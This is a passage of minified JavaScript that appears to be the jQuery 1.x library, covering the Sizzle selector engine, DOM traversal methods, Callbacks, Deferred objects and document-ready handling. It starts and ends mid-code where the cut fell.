RegExp("^"+M+"*,"+M+"*"),T=new RegExp("^"+M+"*([>+~]|"+M+")"+M+"*"),U=new RegExp("="+M+"*([^\\]'\"]*?)"+M+"*\\]","g"),V=new RegExp(Q),W=new RegExp("^"+O+"$"),X={ID:new RegExp("^#("+N+")"),CLASS:new RegExp("^\\.("+N+")"),TAG:new RegExp("^("+N.replace("w","w*")+")"),ATTR:new RegExp("^"+P),PSEUDO:new RegExp("^"+Q),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+L+")$","i"),needsContext:new RegExp("^"+M+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+M+"*((?:-\\d)?\\d*)"+M+"*\\)|)(?=[^-]|$)","i")},Y=/^(?:input|select|textarea|button)$/i,Z=/^h\d$/i,$=/^[^{]+\{\s*\[native \w/,_=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ab=/[+~]/,bb=/'|\\/g,cb=new RegExp("\\\\([\\da-f]{1,6}"+M+"?|("+M+")|.)","ig"),db=function(a,b,c){var d="0x"+b-65536;return d!==d||c?b:0>d?String.fromCharCode(d+65536):String.fromCharCode(d>>10|55296,1023&d|56320)};try{I.apply(F=J.call(v.childNodes),v.childNodes),F[v.childNodes.length].nodeType}catch(eb){I={apply:F.length?function(a,b){H.apply(a,J.call(b))}:function(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function fb(a,b,d,e){var f,h,j,k,l,o,r,s,w,x;if((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,d=d||[],!a||"string"!=typeof a)return d;if(1!==(k=b.nodeType)&&9!==k)return[];if(p&&!e){if(f=_.exec(a))if(j=f[1]){if(9===k){if(h=b.getElementById(j),!h||!h.parentNode)return d;if(h.id===j)return d.push(h),d}else if(b.ownerDocument&&(h=b.ownerDocument.getElementById(j))&&t(b,h)&&h.id===j)return d.push(h),d}else{if(f[2])return I.apply(d,b.getElementsByTagName(a)),d;if((j=f[3])&&c.getElementsByClassName&&b.getElementsByClassName)return I.apply(d,b.getElementsByClassName(j)),d}if(c.qsa&&(!q||!q.test(a))){if(s=r=u,w=b,x=9===k&&a,1===k&&"object"!==b.nodeName.toLowerCase()){o=g(a),(r=b.getAttribute("id"))?s=r.replace(bb,"\\$&"):b.setAttribute("id",s),s="[id='"+s+"'] ",l=o.length;while(l--)o[l]=s+qb(o[l]);w=ab.test(a)&&ob(b.parentNode)||b,x=o.join(",")}if(x)try{return I.apply(d,w.querySelectorAll(x)),d}catch(y){}finally{r||b.removeAttribute("id")}}}return i(a.replace(R,"$1"),b,d,e)}function gb(){var a=[];function b(c,e){return a.push(c+" ")>d.cacheLength&&delete b[a.shift()],b[c+" "]=e}return b}function hb(a){return a[u]=!0,a}function ib(a){var b=n.createElement("div");try{return!!a(b)}catch(c){return!1}finally{b.parentNode&&b.parentNode.removeChild(b),b=null}}function jb(a,b){var c=a.split("|"),e=a.length;while(e--)d.attrHandle[c[e]]=b}function kb(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||D)-(~a.sourceIndex||D);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function lb(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function mb(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function nb(a){return hb(function(b){return b=+b,hb(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e]=c[e]))})})}function ob(a){return a&&typeof a.getElementsByTagName!==C&&a}c=fb.support={},f=fb.isXML=function(a){var b=a&&(a.ownerDocument||a).documentElement;return b?"HTML"!==b.nodeName:!1},m=fb.setDocument=function(a){var b,e=a?a.ownerDocument||a:v,g=e.defaultView;return e!==n&&9===e.nodeType&&e.documentElement?(n=e,o=e.documentElement,p=!f(e),g&&g!==g.top&&(g.addEventListener?g.addEventListener("unload",function(){m()},!1):g.attachEvent&&g.attachEvent("onunload",function(){m()})),c.attributes=ib(function(a){return a.className="i",!a.getAttribute("className")}),c.getElementsByTagName=ib(function(a){return a.appendChild(e.createComment("")),!a.getElementsByTagName("*").length}),c.getElementsByClassName=$.test(e.getElementsByClassName)&&ib(function(a){return a.innerHTML="<div class='a'></div><div class='a i'></div>",a.firstChild.className="i",2===a.getElementsByClassName("i").length}),c.getById=ib(function(a){return o.appendChild(a).id=u,!e.getElementsByName||!e.getElementsByName(u).length}),c.getById?(d.find.ID=function(a,b){if(typeof b.getElementById!==C&&p){var c=b.getElementById(a);return c&&c.parentNode?[c]:[]}},d.filter.ID=function(a){var b=a.replace(cb,db);return function(a){return a.getAttribute("id")===b}}):(delete d.find.ID,d.filter.ID=function(a){var b=a.replace(cb,db);return function(a){var c=typeof a.getAttributeNode!==C&&a.getAttributeNode("id");return c&&c.value===b}}),d.find.TAG=c.getElementsByTagName?function(a,b){return typeof b.getElementsByTagName!==C?b.getElementsByTagName(a):void 0}:function(a,b){var c,d=[],e=0,f=b.getElementsByTagName(a);if("*"===a){while(c=f[e++])1===c.nodeType&&d.push(c);return d}return f},d.find.CLASS=c.getElementsByClassName&&function(a,b){return typeof b.getElementsByClassName!==C&&p?b.getElementsByClassName(a):void 0},r=[],q=[],(c.qsa=$.test(e.querySelectorAll))&&(ib(function(a){a.innerHTML="<select msallowclip=''><option selected=''></option></select>",a.querySelectorAll("[msallowclip^='']").length&&q.push("[*^$]="+M+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+M+"*(?:value|"+L+")"),a.querySelectorAll(":checked").length||q.push(":checked")}),ib(function(a){var b=e.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+M+"*[*^$|!~]?="),a.querySelectorAll(":enabled").length||q.push(":enabled",":disabled"),a.querySelectorAll("*,:x"),q.push(",.*:")})),(c.matchesSelector=$.test(s=o.matches||o.webkitMatchesSelector||o.mozMatchesSelector||o.oMatchesSelector||o.msMatchesSelector))&&ib(function(a){c.disconnectedMatch=s.call(a,"div"),s.call(a,"[s!='']:x"),r.push("!=",Q)}),q=q.length&&new RegExp(q.join("|")),r=r.length&&new RegExp(r.join("|")),b=$.test(o.compareDocumentPosition),t=b||$.test(o.contains)?function(a,b){var c=9===a.nodeType?a.documentElement:a,d=b&&b.parentNode;return a===d||!(!d||1!==d.nodeType||!(c.contains?c.contains(d):a.compareDocumentPosition&&16&a.compareDocumentPosition(d)))}:function(a,b){if(b)while(b=b.parentNode)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocumentPosition(a)===d?a===e||a.ownerDocument===v&&t(v,a)?-1:b===e||b.ownerDocument===v&&t(v,b)?1:k?K.call(k,a)-K.call(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,f=a.parentNode,g=b.parentNode,h=[a],i=[b];if(!f||!g)return a===e?-1:b===e?1:f?-1:g?1:k?K.call(k,a)-K.call(k,b):0;if(f===g)return kb(a,b);c=a;while(c=c.parentNode)h.unshift(c);c=b;while(c=c.parentNode)i.unshift(c);while(h[d]===i[d])d++;return d?kb(h[d],i[d]):h[d]===v?-1:i[d]===v?1:0},e):n},fb.matches=function(a,b){return fb(a,null,null,b)},fb.matchesSelector=function(a,b){if((a.ownerDocument||a)!==n&&m(a),b=b.replace(U,"='$1']"),!(!c.matchesSelector||!p||r&&r.test(b)||q&&q.test(b)))try{var d=s.call(a,b);if(d||c.disconnectedMatch||a.document&&11!==a.document.nodeType)return d}catch(e){}return fb(b,n,null,[a]).length>0},fb.contains=function(a,b){return(a.ownerDocument||a)!==n&&m(a),t(a,b)},fb.attr=function(a,b){(a.ownerDocument||a)!==n&&m(a);var e=d.attrHandle[b.toLowerCase()],f=e&&E.call(d.attrHandle,b.toLowerCase())?e(a,b,!p):void 0;return void 0!==f?f:c.attributes||!p?a.getAttribute(b):(f=a.getAttributeNode(b))&&f.specified?f.value:null},fb.error=function(a){throw new Error("Syntax error, unrecognized expression: "+a)},fb.uniqueSort=function(a){var b,d=[],e=0,f=0;if(l=!c.detectDuplicates,k=!c.sortStable&&a.slice(0),a.sort(B),l){while(b=a[f++])b===a[f]&&(e=d.push(f));while(e--)a.splice(d[e],1)}return k=null,a},e=fb.getText=function(a){var b,c="",d=0,f=a.nodeType;if(f){if(1===f||9===f||11===f){if("string"==typeof a.textContent)return a.textContent;for(a=a.firstChild;a;a=a.nextSibling)c+=e(a)}else if(3===f||4===f)return a.nodeValue}else while(b=a[d++])c+=e(b);return c},d=fb.selectors={cacheLength:50,createPseudo:hb,match:X,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(a){return a[1]=a[1].replace(cb,db),a[3]=(a[3]||a[4]||a[5]||"").replace(cb,db),"~="===a[2]&&(a[3]=" "+a[3]+" "),a.slice(0,4)},CHILD:function(a){return a[1]=a[1].toLowerCase(),"nth"===a[1].slice(0,3)?(a[3]||fb.error(a[0]),a[4]=+(a[4]?a[5]+(a[6]||1):2*("even"===a[3]||"odd"===a[3])),a[5]=+(a[7]+a[8]||"odd"===a[3])):a[3]&&fb.error(a[0]),a},PSEUDO:function(a){var b,c=!a[6]&&a[2];return X.CHILD.test(a[0])?null:(a[3]?a[2]=a[4]||a[5]||"":c&&V.test(c)&&(b=g(c,!0))&&(b=c.indexOf(")",c.length-b)-c.length)&&(a[0]=a[0].slice(0,b),a[2]=c.slice(0,b)),a.slice(0,3))}},filter:{TAG:function(a){var b=a.replace(cb,db).toLowerCase();return"*"===a?function(){return!0}:function(a){return a.nodeName&&a.nodeName.toLowerCase()===b}},CLASS:function(a){var b=y[a+" "];return b||(b=new RegExp("(^|"+M+")"+a+"("+M+"|$)"))&&y(a,function(a){return b.test("string"==typeof a.className&&a.className||typeof a.getAttribute!==C&&a.getAttribute("class")||"")})},ATTR:function(a,b,c){return function(d){var e=fb.attr(d,a);return null==e?"!="===b:b?(e+="","="===b?e===c:"!="===b?e!==c:"^="===b?c&&0===e.indexOf(c):"*="===b?c&&e.indexOf(c)>-1:"$="===b?c&&e.slice(-c.length)===c:"~="===b?(" "+e+" ").indexOf(c)>-1:"|="===b?e===c||e.slice(0,c.length+1)===c+"-":!1):!0}},CHILD:function(a,b,c,d,e){var f="nth"!==a.slice(0,3),g="last"!==a.slice(-4),h="of-type"===b;return 1===d&&0===e?function(a){return!!a.parentNode}:function(b,c,i){var j,k,l,m,n,o,p=f!==g?"nextSibling":"previousSibling",q=b.parentNode,r=h&&b.nodeName.toLowerCase(),s=!i&&!h;if(q){if(f){while(p){l=b;while(l=l[p])if(h?l.nodeName.toLowerCase()===r:1===l.nodeType)return!1;o=p="only"===a&&!o&&"nextSibling"}return!0}if(o=[g?q.firstChild:q.lastChild],g&&s){k=q[u]||(q[u]={}),j=k[a]||[],n=j[0]===w&&j[1],m=j[0]===w&&j[2],l=n&&q.childNodes[n];while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if(1===l.nodeType&&++m&&l===b){k[a]=[w,n,m];break}}else if(s&&(j=(b[u]||(b[u]={}))[a])&&j[0]===w)m=j[1];else while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if((h?l.nodeName.toLowerCase()===r:1===l.nodeType)&&++m&&(s&&((l[u]||(l[u]={}))[a]=[w,m]),l===b))break;return m-=e,m===d||m%d===0&&m/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||fb.error("unsupported pseudo: "+a);return e[u]?e(b):e.length>1?(c=[a,a,"",b],d.setFilters.hasOwnProperty(a.toLowerCase())?hb(function(a,c){var d,f=e(a,b),g=f.length;while(g--)d=K.call(a,f[g]),a[d]=!(c[d]=f[g])}):function(a){return e(a,0,c)}):e}},pseudos:{not:hb(function(a){var b=[],c=[],d=h(a.replace(R,"$1"));return d[u]?hb(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),!c.pop()}}),has:hb(function(a){return function(b){return fb(a,b).length>0}}),contains:hb(function(a){return function(b){return(b.textContent||b.innerText||e(b)).indexOf(a)>-1}}),lang:hb(function(a){return W.test(a||"")||fb.error("unsupported lang: "+a),a=a.replace(cb,db).toLowerCase(),function(b){var c;do if(c=p?b.lang:b.getAttribute("xml:lang")||b.getAttribute("lang"))return c=c.toLowerCase(),c===a||0===c.indexOf(a+"-");while((b=b.parentNode)&&1===b.nodeType);return!1}}),target:function(b){var c=a.location&&a.location.hash;return c&&c.slice(1)===b.id},root:function(a){return a===o},focus:function(a){return a===n.activeElement&&(!n.hasFocus||n.hasFocus())&&!!(a.type||a.href||~a.tabIndex)},enabled:function(a){return a.disabled===!1},disabled:function(a){return a.disabled===!0},checked:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&!!a.checked||"option"===b&&!!a.selected},selected:function(a){return a.parentNode&&a.parentNode.selectedIndex,a.selected===!0},empty:function(a){for(a=a.firstChild;a;a=a.nextSibling)if(a.nodeType<6)return!1;return!0},parent:function(a){return!d.pseudos.empty(a)},header:function(a){return Z.test(a.nodeName)},input:function(a){return Y.test(a.nodeName)},button:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&"button"===a.type||"button"===b},text:function(a){var b;return"input"===a.nodeName.toLowerCase()&&"text"===a.type&&(null==(b=a.getAttribute("type"))||"text"===b.toLowerCase())},first:nb(function(){return[0]}),last:nb(function(a,b){return[b-1]}),eq:nb(function(a,b,c){return[0>c?c+b:c]}),even:nb(function(a,b){for(var c=0;b>c;c+=2)a.push(c);return a}),odd:nb(function(a,b){for(var c=1;b>c;c+=2)a.push(c);return a}),lt:nb(function(a,b,c){for(var d=0>c?c+b:c;--d>=0;)a.push(d);return a}),gt:nb(function(a,b,c){for(var d=0>c?c+b:c;++d<b;)a.push(d);return a})}},d.pseudos.nth=d.pseudos.eq;for(b in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})d.pseudos[b]=lb(b);for(b in{submit:!0,reset:!0})d.pseudos[b]=mb(b);function pb(){}pb.prototype=d.filters=d.pseudos,d.setFilters=new pb,g=fb.tokenize=function(a,b){var c,e,f,g,h,i,j,k=z[a+" "];if(k)return b?0:k.slice(0);h=a,i=[],j=d.preFilter;while(h){(!c||(e=S.exec(h)))&&(e&&(h=h.slice(e[0].length)||h),i.push(f=[])),c=!1,(e=T.exec(h))&&(c=e.shift(),f.push({value:c,type:e[0].replace(R," ")}),h=h.slice(c.length));for(g in d.filter)!(e=X[g].exec(h))||j[g]&&!(e=j[g](e))||(c=e.shift(),f.push({value:c,type:g,matches:e}),h=h.slice(c.length));if(!c)break}return b?h.length:h?fb.error(a):z(a,i).slice(0)};function qb(a){for(var b=0,c=a.length,d="";c>b;b++)d+=a[b].value;return d}function rb(a,b,c){var d=b.dir,e=c&&"parentNode"===d,f=x++;return b.first?function(b,c,f){while(b=b[d])if(1===b.nodeType||e)return a(b,c,f)}:function(b,c,g){var h,i,j=[w,f];if(g){while(b=b[d])if((1===b.nodeType||e)&&a(b,c,g))return!0}else while(b=b[d])if(1===b.nodeType||e){if(i=b[u]||(b[u]={}),(h=i[d])&&h[0]===w&&h[1]===f)return j[2]=h[2];if(i[d]=j,j[2]=a(b,c,g))return!0}}}function sb(a){return a.length>1?function(b,c,d){var e=a.length;while(e--)if(!a[e](b,c,d))return!1;return!0}:a[0]}function tb(a,b,c){for(var d=0,e=b.length;e>d;d++)fb(a,b[d],c);return c}function ub(a,b,c,d,e){for(var f,g=[],h=0,i=a.length,j=null!=b;i>h;h++)(f=a[h])&&(!c||c(f,d,e))&&(g.push(f),j&&b.push(h));return g}function vb(a,b,c,d,e,f){return d&&!d[u]&&(d=vb(d)),e&&!e[u]&&(e=vb(e,f)),hb(function(f,g,h,i){var j,k,l,m=[],n=[],o=g.length,p=f||tb(b||"*",h.nodeType?[h]:h,[]),q=!a||!f&&b?p:ub(p,m,a,h,i),r=c?e||(f?a:o||d)?[]:g:q;if(c&&c(q,r,h,i),d){j=ub(r,n),d(j,[],h,i),k=j.length;while(k--)(l=j[k])&&(r[n[k]]=!(q[n[k]]=l))}if(f){if(e||a){if(e){j=[],k=r.length;while(k--)(l=r[k])&&j.push(q[k]=l);e(null,r=[],j,i)}k=r.length;while(k--)(l=r[k])&&(j=e?K.call(f,l):m[k])>-1&&(f[j]=!(g[j]=l))}}else r=ub(r===g?r.splice(o,r.length):r),e?e(null,g,r,i):I.apply(g,r)})}function wb(a){for(var b,c,e,f=a.length,g=d.relative[a[0].type],h=g||d.relative[" "],i=g?1:0,k=rb(function(a){return a===b},h,!0),l=rb(function(a){return K.call(b,a)>-1},h,!0),m=[function(a,c,d){return!g&&(d||c!==j)||((b=c).nodeType?k(a,c,d):l(a,c,d))}];f>i;i++)if(c=d.relative[a[i].type])m=[rb(sb(m),c)];else{if(c=d.filter[a[i].type].apply(null,a[i].matches),c[u]){for(e=++i;f>e;e++)if(d.relative[a[e].type])break;return vb(i>1&&sb(m),i>1&&qb(a.slice(0,i-1).concat({value:" "===a[i-2].type?"*":""})).replace(R,"$1"),c,e>i&&wb(a.slice(i,e)),f>e&&wb(a=a.slice(e)),f>e&&qb(a))}m.push(c)}return sb(m)}function xb(a,b){var c=b.length>0,e=a.length>0,f=function(f,g,h,i,k){var l,m,o,p=0,q="0",r=f&&[],s=[],t=j,u=f||e&&d.find.TAG("*",k),v=w+=null==t?1:Math.random()||.1,x=u.length;for(k&&(j=g!==n&&g);q!==x&&null!=(l=u[q]);q++){if(e&&l){m=0;while(o=a[m++])if(o(l,g,h)){i.push(l);break}k&&(w=v)}c&&((l=!o&&l)&&p--,f&&r.push(l))}if(p+=q,c&&q!==p){m=0;while(o=b[m++])o(r,s,g,h);if(f){if(p>0)while(q--)r[q]||s[q]||(s[q]=G.call(i));s=ub(s)}I.apply(i,s),k&&!f&&s.length>0&&p+b.length>1&&fb.uniqueSort(i)}return k&&(w=v,j=t),r};return c?hb(f):f}return h=fb.compile=function(a,b){var c,d=[],e=[],f=A[a+" "];if(!f){b||(b=g(a)),c=b.length;while(c--)f=wb(b[c]),f[u]?d.push(f):e.push(f);f=A(a,xb(e,d)),f.selector=a}return f},i=fb.select=function(a,b,e,f){var i,j,k,l,m,n="function"==typeof a&&a,o=!f&&g(a=n.selector||a);if(e=e||[],1===o.length){if(j=o[0]=o[0].slice(0),j.length>2&&"ID"===(k=j[0]).type&&c.getById&&9===b.nodeType&&p&&d.relative[j[1].type]){if(b=(d.find.ID(k.matches[0].replace(cb,db),b)||[])[0],!b)return e;n&&(b=b.parentNode),a=a.slice(j.shift().value.length)}i=X.needsContext.test(a)?0:j.length;while(i--){if(k=j[i],d.relative[l=k.type])break;if((m=d.find[l])&&(f=m(k.matches[0].replace(cb,db),ab.test(j[0].type)&&ob(b.parentNode)||b))){if(j.splice(i,1),a=f.length&&qb(j),!a)return I.apply(e,f),e;break}}}return(n||h(a,o))(f,b,!p,e,ab.test(a)&&ob(b.parentNode)||b),e},c.sortStable=u.split("").sort(B).join("")===u,c.detectDuplicates=!!l,m(),c.sortDetached=ib(function(a){return 1&a.compareDocumentPosition(n.createElement("div"))}),ib(function(a){return a.innerHTML="<a href='#'></a>","#"===a.firstChild.getAttribute("href")})||jb("type|href|height|width",function(a,b,c){return c?void 0:a.getAttribute(b,"type"===b.toLowerCase()?1:2)}),c.attributes&&ib(function(a){return a.innerHTML="<input/>",a.firstChild.setAttribute("value",""),""===a.firstChild.getAttribute("value")})||jb("value",function(a,b,c){return c||"input"!==a.nodeName.toLowerCase()?void 0:a.defaultValue}),ib(function(a){return null==a.getAttribute("disabled")})||jb(L,function(a,b,c){var d;return c?void 0:a[b]===!0?b.toLowerCase():(d=a.getAttributeNode(b))&&d.specified?d.value:null}),fb}(a);m.find=s,m.expr=s.selectors,m.expr[":"]=m.expr.pseudos,m.unique=s.uniqueSort,m.text=s.getText,m.isXMLDoc=s.isXML,m.contains=s.contains;var t=m.expr.match.needsContext,u=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,v=/^.[^:#\[\.,]*$/;function w(a,b,c){if(m.isFunction(b))return m.grep(a,function(a,d){return!!b.call(a,d,a)!==c});if(b.nodeType)return m.grep(a,function(a){return a===b!==c});if("string"==typeof b){if(v.test(b))return m.filter(b,a,c);b=m.filter(b,a)}return m.grep(a,function(a){return m.inArray(a,b)>=0!==c})}m.filter=function(a,b,c){var d=b[0];return c&&(a=":not("+a+")"),1===b.length&&1===d.nodeType?m.find.matchesSelector(d,a)?[d]:[]:m.find.matches(a,m.grep(b,function(a){return 1===a.nodeType}))},m.fn.extend({find:function(a){var b,c=[],d=this,e=d.length;if("string"!=typeof a)return this.pushStack(m(a).filter(function(){for(b=0;e>b;b++)if(m.contains(d[b],this))return!0}));for(b=0;e>b;b++)m.find(a,d[b],c);return c=this.pushStack(e>1?m.unique(c):c),c.selector=this.selector?this.selector+" "+a:a,c},filter:function(a){return this.pushStack(w(this,a||[],!1))},not:function(a){return this.pushStack(w(this,a||[],!0))},is:function(a){return!!w(this,"string"==typeof a&&t.test(a)?m(a):a||[],!1).length}});var x,y=a.document,z=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,A=m.fn.init=function(a,b){var c,d;if(!a)return this;if("string"==typeof a){if(c="<"===a.charAt(0)&&">"===a.charAt(a.length-1)&&a.length>=3?[null,a,null]:z.exec(a),!c||!c[1]&&b)return!b||b.jquery?(b||x).find(a):this.constructor(b).find(a);if(c[1]){if(b=b instanceof m?b[0]:b,m.merge(this,m.parseHTML(c[1],b&&b.nodeType?b.ownerDocument||b:y,!0)),u.test(c[1])&&m.isPlainObject(b))for(c in b)m.isFunction(this[c])?this[c](b[c]):this.attr(c,b[c]);return this}if(d=y.getElementById(c[2]),d&&d.parentNode){if(d.id!==c[2])return x.find(a);this.length=1,this[0]=d}return this.context=y,this.selector=a,this}return a.nodeType?(this.context=this[0]=a,this.length=1,this):m.isFunction(a)?"undefined"!=typeof x.ready?x.ready(a):a(m):(void 0!==a.selector&&(this.selector=a.selector,this.context=a.context),m.makeArray(a,this))};A.prototype=m.fn,x=m(y);var B=/^(?:parents|prev(?:Until|All))/,C={children:!0,contents:!0,next:!0,prev:!0};m.extend({dir:function(a,b,c){var d=[],e=a[b];while(e&&9!==e.nodeType&&(void 0===c||1!==e.nodeType||!m(e).is(c)))1===e.nodeType&&d.push(e),e=e[b];return d},sibling:function(a,b){for(var c=[];a;a=a.nextSibling)1===a.nodeType&&a!==b&&c.push(a);return c}}),m.fn.extend({has:function(a){var b,c=m(a,this),d=c.length;return this.filter(function(){for(b=0;d>b;b++)if(m.contains(this,c[b]))return!0})},closest:function(a,b){for(var c,d=0,e=this.length,f=[],g=t.test(a)||"string"!=typeof a?m(a,b||this.context):0;e>d;d++)for(c=this[d];c&&c!==b;c=c.parentNode)if(c.nodeType<11&&(g?g.index(c)>-1:1===c.nodeType&&m.find.matchesSelector(c,a))){f.push(c);break}return this.pushStack(f.length>1?m.unique(f):f)},index:function(a){return a?"string"==typeof a?m.inArray(this[0],m(a)):m.inArray(a.jquery?a[0]:a,this):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(a,b){return this.pushStack(m.unique(m.merge(this.get(),m(a,b))))},addBack:function(a){return this.add(null==a?this.prevObject:this.prevObject.filter(a))}});function D(a,b){do a=a[b];while(a&&1!==a.nodeType);return a}m.each({parent:function(a){var b=a.parentNode;return b&&11!==b.nodeType?b:null},parents:function(a){return m.dir(a,"parentNode")},parentsUntil:function(a,b,c){return m.dir(a,"parentNode",c)},next:function(a){return D(a,"nextSibling")},prev:function(a){return D(a,"previousSibling")},nextAll:function(a){return m.dir(a,"nextSibling")},prevAll:function(a){return m.dir(a,"previousSibling")},nextUntil:function(a,b,c){return m.dir(a,"nextSibling",c)},prevUntil:function(a,b,c){return m.dir(a,"previousSibling",c)},siblings:function(a){return m.sibling((a.parentNode||{}).firstChild,a)},children:function(a){return m.sibling(a.firstChild)},contents:function(a){return m.nodeName(a,"iframe")?a.contentDocument||a.contentWindow.document:m.merge([],a.childNodes)}},function(a,b){m.fn[a]=function(c,d){var e=m.map(this,b,c);return"Until"!==a.slice(-5)&&(d=c),d&&"string"==typeof d&&(e=m.filter(d,e)),this.length>1&&(C[a]||(e=m.unique(e)),B.test(a)&&(e=e.reverse())),this.pushStack(e)}});var E=/\S+/g,F={};function G(a){var b=F[a]={};return m.each(a.match(E)||[],function(a,c){b[c]=!0}),b}m.Callbacks=function(a){a="string"==typeof a?F[a]||G(a):m.extend({},a);var b,c,d,e,f,g,h=[],i=!a.once&&[],j=function(l){for(c=a.memory&&l,d=!0,f=g||0,g=0,e=h.length,b=!0;h&&e>f;f++)if(h[f].apply(l[0],l[1])===!1&&a.stopOnFalse){c=!1;break}b=!1,h&&(i?i.length&&j(i.shift()):c?h=[]:k.disable())},k={add:function(){if(h){var d=h.length;!function f(b){m.each(b,function(b,c){var d=m.type(c);"function"===d?a.unique&&k.has(c)||h.push(c):c&&c.length&&"string"!==d&&f(c)})}(arguments),b?e=h.length:c&&(g=d,j(c))}return this},remove:function(){return h&&m.each(arguments,function(a,c){var d;while((d=m.inArray(c,h,d))>-1)h.splice(d,1),b&&(e>=d&&e--,f>=d&&f--)}),this},has:function(a){return a?m.inArray(a,h)>-1:!(!h||!h.length)},empty:function(){return h=[],e=0,this},disable:function(){return h=i=c=void 0,this},disabled:function(){return!h},lock:function(){return i=void 0,c||k.disable(),this},locked:function(){return!i},fireWith:function(a,c){return!h||d&&!i||(c=c||[],c=[a,c.slice?c.slice():c],b?i.push(c):j(c)),this},fire:function(){return k.fireWith(this,arguments),this},fired:function(){return!!d}};return k},m.extend({Deferred:function(a){var b=[["resolve","done",m.Callbacks("once memory"),"resolved"],["reject","fail",m.Callbacks("once memory"),"rejected"],["notify","progress",m.Callbacks("memory")]],c="pending",d={state:function(){return c},always:function(){return e.done(arguments).fail(arguments),this},then:function(){var a=arguments;return m.Deferred(function(c){m.each(b,function(b,f){var g=m.isFunction(a[b])&&a[b];e[f[1]](function(){var a=g&&g.apply(this,arguments);a&&m.isFunction(a.promise)?a.promise().done(c.resolve).fail(c.reject).progress(c.notify):c[f[0]+"With"](this===d?c.promise():this,g?[a]:arguments)})}),a=null}).promise()},promise:function(a){return null!=a?m.extend(a,d):d}},e={};return d.pipe=d.then,m.each(b,function(a,f){var g=f[2],h=f[3];d[f[1]]=g.add,h&&g.add(function(){c=h},b[1^a][2].disable,b[2][2].lock),e[f[0]]=function(){return e[f[0]+"With"](this===e?d:this,arguments),this},e[f[0]+"With"]=g.fireWith}),d.promise(e),a&&a.call(e,e),e},when:function(a){var b=0,c=d.call(arguments),e=c.length,f=1!==e||a&&m.isFunction(a.promise)?e:0,g=1===f?a:m.Deferred(),h=function(a,b,c){return function(e){b[a]=this,c[a]=arguments.length>1?d.call(arguments):e,c===i?g.notifyWith(b,c):--f||g.resolveWith(b,c)}},i,j,k;if(e>1)for(i=new Array(e),j=new Array(e),k=new Array(e);e>b;b++)c[b]&&m.isFunction(c[b].promise)?c[b].promise().done(h(b,k,c)).fail(g.reject).progress(h(b,j,i)):--f;return f||g.resolveWith(k,c),g.promise()}});var H;m.fn.ready=function(a){return m.ready.promise().done(a),this},m.extend({isReady:!1,readyWait:1,holdReady:function(a){a?m.readyWait++:m.ready(!0)},ready:function(a){if(a===!0?!--m.readyWait:!m.isReady){if(!y.body)return setTimeout(m.ready);m.isReady=!0,a!==!0&&--m.readyWait>0||(H.resolveWith(y,[m]),m.fn.triggerHandler&&(m(y).triggerHandler("ready"),m(y).off("ready")))}}});function I(){y.addEventListener?(y.removeEventListener("DOMContentLoaded",J,!1),a.removeEventListener("load",J,!1)):(y.detachEvent("onreadystatechange",J),a.detachEvent("onload",J))}function J(){(y.addEventListener||"load"===event.type||"complete"===y.readyState)&&(I(),m.ready())}m.ready.promise=function(b){if(!H)if(H=m.Deferred(),"complete"===y.readyState)setTimeout(m.ready);else if(y.addEventListener)y.addEventListener("DOMContentLoaded",J,!1),a.addEventListener("load",J,!1);else{y.attachEvent("onreadystatechange",J),a.attachEvent("onload",J);var c=!1;try{c=null==a.frameElement&&y.documentElement}catch(d){}c&&c.doScroll&&!function e(){if(!m.isReady){try{c.doScroll("left")}catch(a){return setTimeout(e,50)}I(),m.ready()}}()}return H.promise(b)};var K="undefined",L;for(L in m(k))break;k.ownLast="0"!==L,k.inlineBlockNeedsLayout=!1,m(function(){var a,b,c,d;c=y.getElementsByTagName("body")[0],c&&c.style&&(b=y.createElement("div"),d=y.createElement("div"),d.style.cssText="position:absolute;border:0;width:0;height:0;top:0;left:-9999px",c.appendChild(d).appendChild(b),typeof b.style.zoom!==K&&(b.style.cssText="display:inline;margin:0;border:0;padding:1px;width:1px;zoom:1",k.inlineBlockNeedsLayout=a=3===b.offsetWidth,a&&(c.style.zoom=1)),c.removeChild(d))}),function(){var a=y.createElement("div");if(null==k.deleteExpando){k.deleteExpando=!0;try{delete a.test}catch(b){k.deleteExpando=!1}}a=null}(),m.acceptData=function(a){var b=m.noData[(a.nodeName+" 